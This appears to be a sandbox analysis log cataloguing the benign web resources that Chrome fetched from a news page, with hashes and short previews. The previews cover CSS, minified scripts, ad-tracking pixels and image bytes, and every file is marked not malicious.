                                                                                                                                                                                                                  Preview:.PNG........IHDR.......".....V}.....{PLTE............................................................................................................................x.....(tRNS....!.k6...L........)....Y..D..q>.wdS_._.D...'IDATh..Y.0.M............!.^..z.....&.d.......,...@.....m.&x..l....M.-.k4....kZa.........Y..F....=I..jx.C..H..W......e....o.oO.|..D..?#.D.{~..own*...S.........7..K.....<...nA..~.8."q.@....C2...j...>..t}....(..M..@^....a..x..~J8.n{.G..b$..m_%.Y.........X.X)..Y.b.qk..].....`z...1=...vu..dj..7c').h....L..0.+e*BC...S.....jyzb.\.........3G1K..`..{Kl..{_%....F.....g....h.)n..F...-&...K....)6...hV.e.#3.N..O,.....~'..s....SZ..!.).0..u.....v.1.....<...F...O.O...@....Bk.j.8[.D.4Y.5...h.-..:dAIzn.)>...\..1.....s.#[.{.....}.+.3....T.w..F.#.aaa.....7.5..QR...Q*....].#..n....R..`,q...n..B:..4...=.w.../..fNN...<.P..j.U...D...c.T.(.R.X8..~el..>.h.]]5\....6.-...9#.$.:..a6..1.U..`L.4.%...v....+D.eN.znm....v...H..T....o...;)X.\..0...x..5}B..*.Q.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):19168
                                                                                                                                                                                                                  Entropy (8bit):4.910029242146149
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:67DDBCF3ADB78F6B680F80564CA544FB
                                                                                                                                                                                                                  SHA1:16C13C4A1B36ECB8BEDC29C27701C6D7619329A2
                                                                                                                                                                                                                  SHA-256:D159EC6C311C7058174F59C285532348DABF14B6E323BA519848AE2262C89E03
                                                                                                                                                                                                                  SHA-512:EFBB7D1BC76B8A56405C287A645003CC22B048D22D16415A9F2C7BDCFB164E290FD80ED766FF8A9E19E0A5443B46A9539757AD9DADFD0258938166A55761408A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://cdn.taboola.com/static/impl/css/GTAmerica_2024-03-27.css
                                                                                                                                                                                                                  Preview:@font-face {. font-family: 'GT America Condensed';. src: url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack.eot');. src: local('GT America Condensed Black'), local('GTAmerica-CondensedBlack'),. url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack.eot?#iefix') format('embedded-opentype'),. url('//cdn.taboola.com/static/impl/woff2/GTAmerica-CondensedBlack.woff2') format('woff2'),. url('//cdn.taboola.com/static/impl/woff/GTAmerica-CondensedBlack.woff') format('woff'),. url('//cdn.taboola.com/static/impl/ttf/GTAmerica-CondensedBlack.ttf') format('truetype');. font-weight: 900;. font-style: normal;. font-display: swap;.}..@font-face {. font-family: 'GT America Condensed';. src: url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlackItalic.eot');. src: local('GT America Condensed Black Italic'), local('GTAmerica-CondensedBlackItalic'),. url('//cdn.taboola.com/static/impl/eot/GTAmerica-CondensedBlack
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4365), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4365
                                                                                                                                                                                                                  Entropy (8bit):5.145735525465993
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9D2A8EFBE3FE9705E54DF41100EA2DAE
                                                                                                                                                                                                                  SHA1:9CA39F309735BE4BDA4D6CE2D01C5F0857BD8E67
                                                                                                                                                                                                                  SHA-256:F59452BBA989E5A78E9492AE296CBF910745529C3294B49A58EFA4EC7EBA8D45
                                                                                                                                                                                                                  SHA-512:5D460C83F9DD30038422F843C68D1BE812E3006395355122BBA8E8608822B9751D2800FE024C85276FA36130D787364CF6CFAF333F9C0D3CC6FC2E3DEC796775
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-clipboard-copy-1.0.2-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-clipboard-copy"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a cl
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65120)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):89516
                                                                                                                                                                                                                  Entropy (8bit):5.277607628780762
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:19CBB2663656BBE9187EAD4F32FC1CE1
                                                                                                                                                                                                                  SHA1:A202EA8A31CA2BAD9CD2E0BB3283A1B94C4F4E75
                                                                                                                                                                                                                  SHA-256:8BCBE64E23739F18085E7CA95DCA09585675F0DD6891568180EA6B0CAE0DCCEB
                                                                                                                                                                                                                  SHA-512:F2DB33D13127DF185CCAC8CECF42FD5215951C9DD50405507A7CF7803F95A08944F8DDB1F173D931A8E7B18CD699626701A1BDD84BE35C1B0474329437412BDA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:/*! @name @brightcove/videojs-ima3 @version 5.4.8 @license UNLICENSED */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(require("video.js")):"function"==typeof define&&define.amd?define(["video.js"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).videojs)}(this,(function(e){"use strict";function t(e){return e&&"object"==typeof e&&"default"in e?e:{default:e}}var a=t(e),n="7.5.2";./*! @name videojs-contrib-ads @version 7.5.2 @license Apache-2.0 */var r=function(e,t){t.isImmediatePropagationStopped=function(){return!0},t.cancelBubble=!0,t.isPropagationStopped=function(){return!0}},i=function(e,t,a){r(0,a),e.trigger({type:t+a.type,originalEvent:a})};function o(e){"playing"===e.type?function(e,t){e.ads.isInAdMode()&&(e.ads.isContentResuming()?e.ads._contentEnding&&i(e,"content",t):i(e,"ad",t))}(this,e):"ended"===e.type?function(e,t){e.ads.isInAdMode()?e.ads.isContentResuming()?(r(0,t),e.trigger("resumeended")):i(e,"ad",t):e.ads._contentHasEnded||e.ads.stitc
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):14227
                                                                                                                                                                                                                  Entropy (8bit):7.9606225377683995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6701398D30A3B8BD179373FE91D89288
                                                                                                                                                                                                                  SHA1:C64BC6204820045228C5836D19315CA643F0D46F
                                                                                                                                                                                                                  SHA-256:3C1942BB96AD334E1B42D4D14BDC4EB22C6208C7AC50ABD886AEF13E416EF1AC
                                                                                                                                                                                                                  SHA-512:2DBCF06349A95AE080324EE4035052E4A8127BE53FBEC0CB032B756517ECA5509B5D777C6B81A332A56C46465FDFCCE5CE5D3FAE1DE7884B9EE612D0F51567FB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/1m5s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/1m5s/match/image.jpeg*~hmac=012c49aa64769409d57876bedc62606e9babf639c12e5a88e3b5d26afcdb4b5d
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C....................................#,%.!*!..&4'*./121.%6:60:,010...C...........0 . 00000000000000000000000000000000000000000000000000..........."........................................C.........................!1..AQ"aq.2B....#R..3..Cbr...$%4S..D....................................2........................!1..A"Qa.q.#2..B....3...............?..$BrVD.z.d.'.."+Cl........)Y.M.I:...45..6J.4..I2&....d@...H...H.@..H...P.7H..[.PNA.....DP ....t....@...H.5 .6PQ!dRS.45."...I$........P.F..Y.%d...I$..BE."...H$......(."I$..F..........$...I.B.Cl........H..!dA.$.)&B.VI$S.C.I9..h.$RD@.PI.@t@"vME..E4.#......]"..`I+.Q.) .P.ME.Db).9%...r..BA.....I((..H.BA.$..-....I..=.........1...6.k...B...5.eT.km..\...m|.. .~..._K7..8..M.......s.yX|;.t{i.. x#...}/4C....~....8.4.].....j......w.eo.Gd.W.d..!...s.l..}.....j.7].5...u]70L!k......]2..~..QRp..UbT..":....q.?5.\..#K7awk.6+'.LC9.W.g..s.|.a.....1...3.YR.@.1.:....u.:..]O.t..:.Y4~.O....L.......Qqm.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (8369)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):8375
                                                                                                                                                                                                                  Entropy (8bit):4.938986718408426
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:72532AE716008FCD89700B170128D1B7
                                                                                                                                                                                                                  SHA1:5339A7758DD1504BBF93576D7D4763F4E627EB22
                                                                                                                                                                                                                  SHA-256:39666DD6C751375D8A257D2BA07D321EF84E3A99FFB3B12FED8289EBC38A5D67
                                                                                                                                                                                                                  SHA-512:D7A994AB223A39AA6274B68FEF1CD28A8701BD74E6266F96451CECB34074E6350B2A97D51C4DC7A9A40073099D70D8F7747769BD96646414C1C21D336FFD54D9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://players.brightcove.net/videojs-bc-playlist-ui/5.1.1/videojs-bc-playlist-ui.css
                                                                                                                                                                                                                  Preview:..vjs-playlist{padding:0;background-color:#1a1a1a;color:#fff;list-style-type:none}.vjs-playlist img{display:block}.vjs-playlist .vjs-playlist-item-list{position:relative;margin:0;padding:0;list-style:none}.vjs-playlist .vjs-playlist-item{position:relative;cursor:pointer;overflow:hidden}.vjs-playlist .vjs-playlist-thumbnail-placeholder{background:#303030}.vjs-playlist .vjs-playlist-now-playing-text{display:none;position:absolute;top:0;left:0;padding-left:2px;margin:.8rem}.vjs-playlist .vjs-playlist-duration{position:absolute;top:.5rem;left:.5rem;padding:2px 5px 3px;margin-left:2px;background-color:rgba(26, 26, 26, 0.8)}.vjs-playlist .vjs-playlist-title-container{position:absolute;bottom:0;box-sizing:border-box;width:100%;padding:.5rem .8rem;text-shadow:1px 1px 2px #000,-1px 1px 2px #000,1px -1px 2px #000,-1px -1px 2px #000}.vjs-playlist .vjs-playlist-name{display:block;max-height:2.5em;padding:0 0 4px 2px;font-style:normal;text-overflow:ellipsis;overflow:hidden;white-space:nowrap;line
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.875
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmCGhhNdtLxFRIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                  Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                  Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                  SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                  SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                  SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1589), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1589
                                                                                                                                                                                                                  Entropy (8bit):5.623100817581989
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:404A3C1DE4976928CC4CA01E9FE603E5
                                                                                                                                                                                                                  SHA1:AC33482928A6A465C39B7FD344825475A854DAE0
                                                                                                                                                                                                                  SHA-256:D92BAE6F581B6458EF92EE5B771F97F8DAFFEE5DFD1B3B2BBFF762459F18A519
                                                                                                                                                                                                                  SHA-512:7862D832D1C4521ABFD794348EBCFC2717354C708B0E1CADB2171E1C8407FD3BBD3791C53A4363BCB3D2481C370C650684F6C8E87E43B400C010C5EDA1194DF3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:PubMatic.loadAsyncImagePixel('https://pixel.onaudience.com/?partner=214&mapped=833930F6-1D46-4D29-BD94-31974E2C647C&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://c1.adform.net/serving/cookie/match?party=14&cid=833930F6-1D46-4D29-BD94-31974E2C647C&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://match.adsby.bidtheatre.com/pubmaticmatch?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTMwNjImdGw9MTI5NjAw&piggybackCookie=uid:$UID&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://cm-supply-web.gammaplatform.com/adx/usersyncsupply?pid=7&t=pixel');PubMatic.loadAsyncIframePixel('https://cm.adgrx.com/bridge?AG_PID=pubmatic&AG_SETCOOKIE&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://a.tribalfusion.com/i.match?p=b11&redirect=https%3A//simage2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTMzMjYmdGw9MTI5NjAw%26piggybackCookie%3D%24TF_USER_ID_ENC%24&u=${PUBMATIC_UID}');PubMatic.loadAsyncIframePixel('https:/
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 260 x 340
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):539840
                                                                                                                                                                                                                  Entropy (8bit):7.950660003114956
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:2FB9D43C74752389405ABC1A5814B44A
                                                                                                                                                                                                                  SHA1:BD551A3693F34693083D37EEE3113D667CE4F3C4
                                                                                                                                                                                                                  SHA-256:7A18441E184306E7F51C5493C0C17F676C73E12F518DC468DCB565B25D90FC41
                                                                                                                                                                                                                  SHA-512:D0CED802BD8B03554E538D1316CC37EEFA4E0CBA33E54242BA36F4C1A3D1B991135208B54064499E571A21562AEFC67DBBE691B38E333148CCAB2518B229AA80
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:GIF89a..T.......................................................................U..R..Q..O........K..M..N..N..O..P..Q..Q..S..U..N................^<.mC.N..O..L".Q..S..[..M.....d.d?...pA.iM.h/.i........f...........................................................................................................w..o.rW.S..U..O..Q..S..^$.`0.M..N..O.....................}.hN.X5.X..o>.U..S..P..R..N...n.M..Q.............M%.W..r5..W..P..e..d.Y4.._&.Z$......v._=.^,.pR.Y#.kB.f5.}.O....R..S..S..}D............`@.hC.`3.....^5.U$.X..M"....M..U%.U!.a4.M..Q..M .N..N..Q..O..O..Q..P..U..U.........hD.w\...^<.uR.`1.z.]2.Z+.~.X).vQ.W..k...U..P...b.P...v.t.W..v..V.].pP...P..X"....X*.{U........X,.f.v`.....^..vQ.L..L.....N).jN.|].N..{N.qO.................!..NETSCAPE2.0.....!.)Optimized with https://ezgif.com/optimize.!.......,......T....................H........L..............L*.....J.....j..........N....................(8HXhx..........)9IYiy..........*:JZjz
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x156, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):6936
                                                                                                                                                                                                                  Entropy (8bit):7.969991789157713
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:17C7306A29B365EAF54BFACBC24AF9C3
                                                                                                                                                                                                                  SHA1:CD0E410AEE34C0A0645827495DA2E65C967A1E2B
                                                                                                                                                                                                                  SHA-256:8C2C125CC815397428E910F7978FA977C23620108BE9137B82F77EBEE63639A2
                                                                                                                                                                                                                  SHA-512:0C1F586232D41AE780121A2101263811FF489AB1A850C48D7FE3700D40777D7194FDAAFF399638BFE8C88A250F4F45FD0FEC3E56C5C3917488CDE900395853D7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/1RP927ovsVr5pXHhvXbtOA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/e3ffa270-819b-11ef-8fe3-5dceaaabd142.cf.webp
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 .....i...*,...>y4.G.."#..\....h.@S.X..\m."..?....c.~L.c..~J...u...'..._.^..H{.~......3.=...../....P...z.=..q.:.............O~...u.3..A.b.GQ....._........ ...$.....?......:Vz9...4.vv.N..E...T...1.......tv....I.......5.U.G.*|.P.JU...cb.Q...\e.X5..c.x..6..ei....k......8..{.$x.i.2.]..]._....;9{..E^9.I.>."j.....w...}.....h.)......&...*g..t.`w...;^=.........^.q*..d`.-.....a...!j.1UY...2un....C...tV.(.!H6.T.#..P.q.lC.....w.X.'6........{0-."..q.....a...L..b..0.s@..w&k$!..c.V..m.L..F..{.$.|p....."8Y.U._...u..%...Y..#JK..4..&.{;..aa.^A..?.m...>p...#v..........b......5'$.HS.B...!..=A.3.....XaK.f....3bi.,...G..aX.3.6...K..SR......bmm....#._.._to....q~..~7....}.[.u&...p.A}hc....7....~b....?.{.U....R].:_......3N ...e..(R......K..x.|.>......N.Cum.).M.Pq..y..........c.cjX..I..O.....OO.N....P..C....TS.Wyf.phJG...:g5M/_...L.....'.....0~...%....Y.....g*....s...........K.e...~_.........G..L......<.....C...NQ......`/%...RZ3....t..u....J.ZA..
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2074), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2074
                                                                                                                                                                                                                  Entropy (8bit):5.260719431857589
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:93D5BB91C9A48C4EDBC164A65354B00C
                                                                                                                                                                                                                  SHA1:EA8D8A5F20B4061A7581135B465F7D81F431390C
                                                                                                                                                                                                                  SHA-256:E17075CF2F747253CB3C737891BE0F417B8F4330DDAB9D53013BDD4EBCA568EE
                                                                                                                                                                                                                  SHA-512:3F0F5D520F75A443304ED277F73F050698029942A1A01B9B65A8F0D38846B7DFA04D126685A75436BC3534D94DD0C9B1BCCC6DB2C628C58FF74453FA92FD9D22
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(){var n="tsdtocl",e="!-#@",t="ul",i="https:",o=atob("aHR0cHM6Ly90c2R0b2NsLmNvbQ=="),r={},a=i,d=-1,c,u;try{var s=function n(e){r[e.id]&&(r[e.id](e),delete r[e.id])},w=function e(t){var i;try{i=JSON.parse(t.data)}catch(n){}i&&i.namespace===n&&s(i)},f=function e(t,i,o,a){if(c){r[++d]=a;var u={namespace:n,id:d,action:t,key:i,value:o};return c&&c.contentWindow&&c.contentWindow.postMessage(JSON.stringify(u),"*"),u}},l=function n(e){for(var t="".concat(e,"="),i=document.cookie.split(";"),o=0;o<i.length;o++){for(var r=i[o];" "===r.charAt(0);)r=r.substring(1);if(0===r.indexOf(t))return r.substring(t.length,r.length)}return""},g=function n(e,t,i){return f("append",e,t,i)},p=function n(t){if(t&&"string"==typeof t&&-1!==t.indexOf(e)){var i=new Image;return i.src="".concat(a,"//trc.taboola.com/sg/taboola-ifs/1/um/?uils=").concat(encodeURIComponent(t)),i}},m=function n(e){if(e&&e.success){if(e.wasAppended&&e.value)return p(e.value)}else window.__trcDebug&&window.__trcDebug("ifsDebug=".conc
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (64457), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):67717
                                                                                                                                                                                                                  Entropy (8bit):5.404608504229257
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6EA12FCCBED15820786C87F0B9B67D61
                                                                                                                                                                                                                  SHA1:0B1945893B1F90112CB7B1615DD751A17F0BE14F
                                                                                                                                                                                                                  SHA-256:CBEEE7DA6CC21D0D3394C55FAB07C9005D10405A505117CB41C2A1B013773B97
                                                                                                                                                                                                                  SHA-512:D06684BA7C541FA5CE2879FAE1632B1996475A3CCE1E7384F396E07010BFC336F2A9A976D07E9A1F97C2620D70B6F465F216E6EDF4243C0245C8FA51772CF072
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("HomepageClient",[],t):"object"==typeof exports?exports.HomepageClient=t():e.HomepageClient=t()}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var r=o[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var n=window.webpackJsonpHomepageClient;window.webpackJsonpHomepageClient=function(t,o,i){for(var a,s,c=0,l=[];c<t.length;c++)s=t[c],r[s]&&l.push(r[s][0]),r[s]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(e[a]=o[a]);for(n&&n(t,o,i);l.length;)l.shift()()};var o={},r={1:0,2:0};return t.e=function(e){function n(){s.onerror=s.onload=null,clearTimeout(c);var t=r[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),r[e]=void 0)}var o=r[e];if(0===o)return new Promise(function(e){e()});if(o)return o[2];var i=new Promise(function(t,n){o=r[e]=[t,n]});o[2]=i;v
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):11631
                                                                                                                                                                                                                  Entropy (8bit):7.932901426062808
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:551F81E610BFEEBBCC355CEF942EE24A
                                                                                                                                                                                                                  SHA1:8EDE0323D9C20B23531503E4CF6F35D77B409C1B
                                                                                                                                                                                                                  SHA-256:E3B887024F1FDB2B45CE5BC7C02280CEBA34AD6F5A94CE903FB3C91E72A22F08
                                                                                                                                                                                                                  SHA-512:BD26E3EB2AF0C9BC77DF7392586EE1A4BF0A0B85E0783D5A40A64EE14371A83D48E45CD4B987DE7C0992050AA6AA29D71504E68D33046994A5B3B80AF72C83F2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/0s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/0s/match/image.jpeg*~hmac=68f1c2911b34518d7e3c0dbeed80cfa790dba7cf660a21ab9427543a1aaee949
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C........................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...C...........7%.%77777777777777777777777777777777777777777777777777...........".......................................@.........................!1..AQ.Raq"B...2..#b..3Cr.....$4Sc.................................'.........................!1.A2Qq."#..............?..j" ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""." ""....."....d..yh...........'.PbU..<.q.-..b.....p...E..I_.E.$.......38..#J....u.jV....|Rl9...n....C...J....Q.GN.N.<5......;_+...6...P~.pJln.........-Zd.I.......(<...g...(..Y.&....i...... .../..6.t.$8..bR..X|,.E.,.]..v..jn.T...G..L...p...S.F....._M..5..&%.....|$&<.P."..d.....mmA!.....$....CHp.JX....a{.67E.}....o...].G.q.5,.I..o..A.v\...C..7.WS..<........%e..Tb.cd.h./.tA.X......W.....4.Q....72..t.m......M'.R.!...O.N@i.c.xk.,r.......X.f/KB...+&k....r...}..+.b.k..x.n.....a4...vw.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):18287
                                                                                                                                                                                                                  Entropy (8bit):7.961929756617053
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:EEE993B5ED8FECA200B0350618E6977E
                                                                                                                                                                                                                  SHA1:F7BDC391A4CEBC2D91E55F92AEE53CB28D4CE088
                                                                                                                                                                                                                  SHA-256:F841EAC4233803FB5C2FE328DB6C32AB76268F550A0725A7B8DF7F3B06BAFC1B
                                                                                                                                                                                                                  SHA-512:68798ECBEFB620F23D4A9A74EF826AFA47DA755445A995F8FB210041179745012B0A7B40E29020CAC1F22D0EEBEE164164CB68074A344A1E279A0AC1D6DFE322
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
